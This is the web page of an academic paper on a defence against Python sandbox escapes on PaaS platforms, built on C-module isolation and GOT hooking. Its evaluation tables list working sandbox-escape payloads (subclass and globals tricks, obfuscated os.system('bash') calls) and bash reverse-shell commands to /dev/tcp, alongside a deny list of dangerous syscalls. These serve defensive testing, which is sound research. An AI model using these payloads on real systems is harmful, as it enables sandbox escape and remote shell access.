基于第三方库隔离的Python沙箱逃逸防御机制

doi:10.3969/j.issn.1671-1122.2024.05.003

信息网络安全 ›› 2024, Vol. 24 ›› Issue (5): 682-693.doi: 10.3969/j.issn.1671-1122.2024.05.003

• 专题论文：网络安全防御 • 上一篇下一篇

基于第三方库隔离的Python沙箱逃逸防御机制

杨志鹏¹^,², 王鹃¹^,²(), 马陈军¹^,², 亢云峰³

1.武汉大学国家网络安全学院，武汉 430072
2.武汉大学空天信息安全与可信计算教育部重点实验室，武汉 430072
3.北京华为数字技术有限公司，北京 100085

收稿日期:2023-05-04 出版日期:2024-05-10 发布日期:2024-06-24
通讯作者: 王鹃 E-mail:jwang@whu.edu.cn
作者简介:杨志鹏（1999—），男，湖南，硕士研究生，主要研究方向为系统和软件安全|王鹃（1976—），女，湖北，教授，博士，CCF会员，主要研究方向为系统和软件安全、可信计算、人工智能应用、云计算、物联网安全|马陈军（2000—），男，安徽，硕士研究生，主要研究方向为系统和软件安全|亢云峰（1983—），男，陕西，工程师，主要研究方向为系统安全
基金资助:
国家自然科学基金(61872430);国家重点研发计划(2020AAA0107700);国家电网有限公司科技项目(520940210009)

Python Sandbox Escape Defense Mechanism Based on Third-Party Library Isolation

YANG Zhipeng¹^,², WANG Juan¹^,²(), MA Chenjun¹^,², KANG Yunfeng³

1. School of Cyber Science and Engineering, Wuhan University, Wuhan 430072, China
2. Key Laboratory of Aerospace Information Security and Trusted Computing of Ministry of Education, Wuhan University, Wuhan 430072, China
3. Beijing Huawei Digital Technologies Co., Ltd., Beijing 100085, China

Received:2023-05-04 Online:2024-05-10 Published:2024-06-24
Contact: WANG Juan E-mail:jwang@whu.edu.cn

摘要/Abstract

摘要：

PaaS平台由于可提供Python服务成为目前较受欢迎的云服务。PaaS平台应用Python沙箱解决安全问题，同时允许用户使用Python C化模块以降低Python对性能的影响。然而，攻击者能够利用Python沙箱策略的漏洞进行逃逸，导致危害底层系统。现有的Python沙箱大多在代码层进行防御，缺乏对Python C化模块的监管和防护。文章分析了Python C化模块的底层原理和Python沙箱逃逸的特点，针对沙箱逃逸后需要执行特定危险函数发起攻击的特征，提出一种基于第三方库隔离的Python沙箱逃逸防御机制，并实现了原型系统。该机制的原型系统利用GOT Hook技术对Python的C化模块导入行为和危险函数调用行为进行接管，在Python导入C化模块时，提前对该C化模块进行安全检查和隔离。另外，在Python调用危险函数时，对该函数的参数进行检查。实验结果表明，文章所提机制能够有效防御攻击者利用自定义的C化模块逃逸Python沙箱以及使用恶意参数调用危险函数。在正常使用时，文章所提机制的时间开销较低，平均时间开销小于5%。

关键词: Python沙箱, 第三方库隔离, 沙箱逃逸防御机制, Hook技术

Abstract:

The PaaS platform has become a popular cloud service due to its ability to provide Python services. PaaS platform utilizes Python sandboxes to ensure security, while also allowing users to use optimized Python C-modules to reduce the impact of Python on performance. However, attackers can exploit vulnerabilities in Python sandbox policies to escape and harm the underlying system. Most of the existing Python sandboxes are used for defense at the code level, lacking supervision and protection of Python C-modules. This paper analyzed the underlying principles of Python C-modules and the characteristics of Python sandbox escapes. Targeting the specific dangerous functions executed after the sandbox escape, this paper proposed a Python sandbox escape defense mechanism based on third-party library isolation and implemented a prototype system. The prototype system leveraged GOT Hook technology to take over C-module import and dangerous function call in Python. Therefore, the system was capable of checking and isolating C-modules before they were imported. Moreover, when dangerous functions were called, the system checked the parameters. The experimental results demonstrate that the system effectively mitigates attacker’s abusively use of custom C-modules to escape Python sandboxes and calling dangerous functions with malicious parameter. The mechanism has negligible overheads in normal Python applications, with an average time overhead of less than 5%.

Key words: Python sandbox, third-party library isolation, sandbox escape defense mechanism, Hook technology

中图分类号:

TP309

杨志鹏, 王鹃, 马陈军, 亢云峰. 基于第三方库隔离的Python沙箱逃逸防御机制[J]. 信息网络安全, 2024, 24(5): 682-693.

YANG Zhipeng, WANG Juan, MA Chenjun, KANG Yunfeng. Python Sandbox Escape Defense Mechanism Based on Third-Party Library Isolation[J]. Netinfo Security, 2024, 24(5): 682-693.

图/表 13

表1

图1

图2

表2

表3

图3

图4

表4

表5

表6

表7

图5

图6

参考文献 36

[1]	TIOBE. TIOBE Index for March 2023[EB/OL]. (2023-02-25)[2023-03-08]. https://www.tiobe.com/tiobe-index/.
[2]	Slant. What are the Best Platform-as-a-Services (PaaS) to Deploy a Python Web Application[EB/OL]. (2022-10-10)[2023-03-08]. https://www.slant.co/topics/356/-best-platform-as-a-services-PaaS-to-deploy-a-python-web-application.
[3]	Baked Potato999. Virtualenv Sandbox Escape[EB/OL]. (2018-09-30)[2023-03-08]. https://github.com/pypa/virtualenv/issues/1207.
[4]	SEO J, LAM M S. InvisiType: Object-Oriented Security Policies[EB/OL]. (2010-01-01)[2023-03-08]. https://www.researchgate.net/publication/ 221655452_InvisiType_Object-Oriented_Security_Policies.
[5]	SUN Ming, GU Dawu, LI Juanru, et al. PyXhon: Dynamic Detection of Security Vulnerabilities in Python Extensions[C]// IEEE. 2012 IEEE International Conference on Information Science and Technology. New York: IEEE, 2012: 461-466.
[6]	WANG Heng. Research on Python Sandbox on PaaS Platform[D]. Nanjing: Nanjing University, 2014.
	王衡. PaaS平台上Python沙箱研究[D]. 南京: 南京大学, 2014.
[7]	LIU Peiyao. Research and Implementation of Vulnerability Detection in Python Scripts[D]. Beijing: Beijing Jiaotong University, 2019.
	刘佩瑶. Python脚本的脆弱性检测研究与实现[D]. 北京: 北京交通大学, 2019.
[8]	PARK T, LETTNER J, NA Y, et al. Bytecode Corruption Attacks are Real-And How to Defend Against Them[C]// Springer. The 15th Detection of Intrusions and Malware, and Vulnerability Assessment (DIMVA 2018). Heidelberg: Springer, 2018: 326-348.
[9]	JUSTIN C, ARMON D, JEFF R, et al. Retaining Sandbox Containment Despite Bugs in Privileged Memory-Safe Code[C]// ACM. The 17th ACM Conference on Computer and Communications Security (CCS’10). New York: ACM, 2010: 212-223.
[10]	Seattle Testbed. Repy_v2[EB/OL]. (2021-12-22)[2023-03-09]. https://github.com/SeattleTestbed/repy_v2.
[11]	The PyPy Project. PyPy’s Sandboxing Features[EB/OL]. (2019-08-23)[2023-03-09]. https://doc.pypy.org/en/latest/sandbox.html.
[12]	JIANG Chengman, HUA Baojian, FAN Qiliang, et al. Empirical Security Study of Native Code in Python Virtual Machines[J]. Computer Science, 2022, 49(6A): 474-479. doi: 10.11896/jsjkx.210600200
	蒋成满, 华保健, 樊淇梁, 等. Python虚拟机本地代码的安全性实证研究[J]. 计算机科学, 2022, 49(6A): 474-479. doi: 10.11896/jsjkx.210600200
[13]	GREAMO C, GHOSH A. Sandboxing and Virtualization: Modern Tools for Combating Malware[J]. IEEE Security & Privacy, 2011, 9(2): 79-82.
[14]	Python Software Foundation. OS-Miscellaneous Operating System Interfaces[EB/OL]. (2023-01-13)[2023-03-14]. https://docs.python.org/3/library/os.html.
[15]	Python Software Foundation. Subprocess-Subprocess Management[EB/OL].(2023-02-25)[2023-03-14]. https://docs.python.org/3/library/subprocess.html.
[16]	Python Software Foundation. Ctypes-A Foreign Function Library for Python[EB/OL]. (2023-01-10)[2023-03-14]. https://docs.python.org/3/library/ctypes.html.
[17]	Python Software Foundation. Extending Python with C or C++[EB/OL]. (2023-02-05)[2023-03-14]. https://docs.python.org/3/extending/extending.html.
[18]	CHEN Ru. Python Source Code Analysis: Deep Exploration of Dynamic Language Core Technologies[M]. Beijing: Electronic Industry Press, 2018.
	陈儒. Python 源码剖析:深度探索动态语言核心技术[M]. 北京: 电子工业出版社, 2018.
[19]	YU Jiazi. Self Cultivation of Programmers-Linking, Loading, and Libraries[M]. Beijing: Electronic Industry Press, 2009.
	俞甲子. 程序员的自我修养—链接、装载与库[M]. 北京: 电子工业出版社, 2009.
[20]	TAN Gang. Principles and Implementation Techniques of Software-Based Fault Isolation[J]. Foundations and Trends in Privacy and Security, 2017, 1(3): 137-198.
[21]	YEE B, SEHR D, DARDYK G, et al. Native Client: A Sandbox for Portable, Untrusted x86 Native Code[J]. Communications of the ACM, 2010, 53(1): 91-99.
[22]	Web Assembly Community Group. Introduction[EB/OL]. (2023-03-28)[2023-04-05]. https://webassembly.github.io/spec/core/intro/introduction.html.
[23]	NARAYAN S, DISSELKOEN C, GARFINKEL T, et al. Retrofitting Fine Grain Isolation in the Firefox Renderer[C]// USENIX. The 29th USENIX Conference on Security Symposium. Berkeley: USENIX, 2020: 699-716.
[24]	BOSAMIYA J, LIM W S, PARNO B. {Provably-Safe} Multilingual Software Sandboxing Using {Web Assembly}[C]// USENIX. 31st USENIX Security Symposium (USENIX Security 22). Berkeley: USENIX, 2022: 1975-1992.
[25]	BAUER M, ROSSOW C. Cali: Compiler-Assisted Library Isolation[C]// ACM. The 2021 ACM Asia Conference on Computer and Communications Security. New York: ACM, 2021: 550-564.
[26]	QIAN Weizhong, CAO Yong, DAI Weiqi, et al. Libsec: A Hardware Virtualization-Based Isolation for Shared Library[C]// IEEE. 2017 IEEE 19th International Conference on High Performance Computing and Communications. New York: IEEE, 2017: 34-41.
[27]	VOULIMENEAS A, VINCK J, MECHELINCK R, et al. You Shall Not (By) Pass! Practical, Secure, and Fast PKU-Based Sandboxing[C]// ACM. The Seventeenth European Conference on Computer Systems. New York: ACM, 2022: 266-282.
[28]	XU Yuanchao, YE Chencheng, SOLIHIN Y, et al. Hardware-Based Domain Virtualization for Intra-Process Isolation of Persistent Memory Objects[C]// IEEE. 2020 ACM/IEEE 47th Annual International Symposium on Computer Architecture (ISCA). New York: IEEE, 2020: 680-692.
[29]	KIRTH P. Practical Methods for Automatic Intra-Process Compartmentalization with MPK[D]. California: University of California, 2021.
[30]	BAUER M, ROSSOW C. Cali: Compiler-Assisted Library Isolation[C]// ACM. The 2021 ACM Asia Conference on Computer and Communications Security. New York: ACM, 2021: 550-564.
[31]	Wikipedia Contributors. Buffer Overflow Protection[EB/OL]. (2006-04-05)[2023-04-05]. https://en.wikipedia.org/w/index.php?title=Buffer_overflow_protection&oldid=1142587744.
[32]	BUROW N, ZHANG Xinping, PAYER M. SoK: Shining Light on Shadow Stacks[C]// IEEE. 2019 IEEE Symposium on Security and Privacy (SP). New York: IEEE, 2019: 985-999.
[33]	KUZNETSOV V, SZEKERES L, PAYER M, et al. {Code-Pointer} Integrity[C]// USENIX. 11th USENIX Symposium on Operating Systems Design and Implementation (OSDI 14). Berkeley: USENIX, 2014: 147-163.
[34]	MICHAEL K. Ld. so(8) -Linux Manual Page[EB/OL]. (2022-06-14)[2023-04-25]. https://man7.org/linux/man-pages/man8/ld.so.8.html.
[35]	Victor Stinner. The Python Performance Benchmark Suite[EB/OL]. (2016-08-14)[2023-04-05]. https://pyperformance.readthedocs.io/index.html.
[36]	ANDREY I. AI Benchmark for Windows, Linux and MacOS: Let the AI Games Begin[EB/OL]. (2019-06-28)[2023-04-05]. https://ai-benchmark.com/alpha.

名称	针对攻击面			方法	性能开销	兼容性
名称	Python 代码	Python 虚拟机	C化模块	方法	性能开销	兼容性
InvisiType^[4]	√	—	—	扩展原始类	低	只支持面向对象编程的Python应用
PyXhon^[5]	√	—	—	关键函数和字节码跟踪	高	较好
OpSandBox^[6]	√	—	—	字节码插桩+访问控制	中	仅支持Python 2且无法监控二进制代码
文献[7]方法	√	—	—	污点分析+机器学习	高	较好
文献[8]方法	√	√	—	限制字节码对象为只读	高	较好
Repy^[10]	√	√	—	Python微内核+安全分层	中	C化模块可能无法正常运行
PyPy^[11]	√	√	—	进程隔离+ 限制特权功能	低	C化模块可能无法正常运行
PyGuard^[12]	—	√	—	过程内分析+ 漏洞模式识别	高	较好
本文机制	√	—	√	第三方库隔离	低	较好

API	作用	备注
mmap()	映射内存	映射可写可执行内存，执行任意shellcode
mprotect()	修改内存属性	修改内存属性为可写可执行，执行shellcode
mremap()	重新映射内存	将内存重新映射为可写可执行，执行shellcode
shmat()	映射共享内存	将共享内存映射为可写可执行，执行shellcode
prctl	进程控制	提权、隐藏进程等
execve()	执行程序	执行恶意程序
execveat()	执行程序	执行恶意程序
popen()	执行命令	执行恶意命令、开启后门等
system()	执行命令	执行恶意命令、开启后门等

API	作用	备注
ptrace()	进程跟踪	恶意控制其他进程
process_vm_readv()	读其他进程的数据	恶意读取其他进程数据
process_vm_writev()	向其他进程写入数据	恶意修改其他进程数据
kill()	向其他进程发送信号	恶意杀死其他进程
settimeofday()	设置系统时间	恶意修改系统时间
clock_settime()	设置系统时钟	恶意修改系统时间
clock_adjtime()	调整系统时钟	恶意修改系统时钟
adjtimex()	调整内核时钟	恶意修改系统时间
setuid()/setgid()	设置UID/GID	提权
setreuid()	设置real和effective UID	提权
setregid()	设置real和effective GID	提权
setgroups()	设置进程用户组	提权
setresuid()	设置real和effective UID，以及set-user-ID	提权
setresgid()	设置real和effective GID，以及set-group-ID	提权
setfsuid()/setfsgid()	设置文件系统检查时的有效UID/GID	提权
capset()	设置Capability	提权
iopl()/ioperm()	设置端口权限	提权
add_key()	向内核添加密钥	提权
mount()	挂载文件系统	恶意挂载机密分区
unmount2()/unmount()	卸载文件系统	恶意卸载必要文件系统
chroot()	切换根目录	沙箱逃逸
unshare()	创建并进入新namespace	提权、沙箱逃逸
setns()	切换namespace	沙箱逃逸
acct()	开启或关闭系统审计	逃避审计
reboot()	重启	破坏系统正常运行
quotactl()	操纵磁盘配额	破坏系统正常运行
sethostname()	设置hostname	破坏系统正常运行
setdomainname()	设置domain name	破坏系统正常运行
bpf()	在内核执行bpf程序	执行恶意bpf程序

对象	结果
正常模块	正常导入，并且模块功能正常
恶意模块	禁止导入，并且检测到调用了popen

参数	功能	结果
echo ls\|bash	间接执行指令	拦截
ls	遍历文件系统	未拦截
ls \|\| bash -i >&/dev/tcp/[ip]/[port] 0>&1	反弹shell	拦截
bash -i >&/dev/tcp/[ip]/[port] 0>&1	反弹shell	拦截
echo bash	输出字符串	未拦截
$( bash -i >&/dev/tcp/[ip]/[port] 0>&1)	反弹shell	拦截
$(ls)	遍历文件系统	未拦截
bash -i >&/dev/tcp/[ip]/[port] 0>&1	反弹shell	拦截

基于第三方库隔离的Python沙箱逃逸防御机制

Python Sandbox Escape Defense Mechanism Based on Third-Party Library Isolation

RichHTML

PDF (PC)

可视化

摘要/Abstract

引用本文

使用本文

图/表 13

参考文献 36

相关文章 2

编辑推荐

Metrics

本文评价

攻击代码	功能	结果
getattr(getattr(__builtins__,’__tropmi__'[::-1])('so'[::-1]),’metsys'[::-1])('bash')	获取shell	拦截
getattr(getattr(__builtins__,’__tropmi__'[::-1])('so'[::-1]),’metsys'[::-1])('ls')	执行ls	未拦截
object.__subclasses__()[37].__call__(eval,”__import__('os').system('bash')")	获取shell	拦截
object.__subclasses__()[134].__init__.__globals__['sys'].modules['os'].system('bash')	获取shell	拦截
(lambda x:1).__globals__['__builtins__'].__dict__['eval']("__import__('os').system('bash')")	获取shell	拦截
timeit.timeit("__import__('os').system('bash')", number=1)	获取shell	拦截
exec(compile('__import__("os").system("bash")',’<string>',’exec'))	获取shell	拦截
f{__import__("os").system("bash")}	获取shell	拦截
[c for c in ().__class__.__base__.__subclasses__() if c.__name__ == 'catch_warnings’][0]()._module.__builtins__['eval']("__import__('os').system('bash')”)	获取shell	拦截

[1]	杨春晖, 严承华. 基于进程管理的安全策略分析[J]. 信息网络安全, 2014, 14(8): 61-66.
[2]	马国群;刘忆宁;龙腾飞;黄龙;张永昌;罗家华. 智能手机安全防护系统开发研究[J]. , 2011, 11(5): 0-0.

任务	原始执行时间/s	使用本文机制后执行时间/s	检查库数量/个	本文机制时间开销占比
psutil	54.42	55.12	4	1.28%
fast-pandas	383.00	411.85	138	7.53%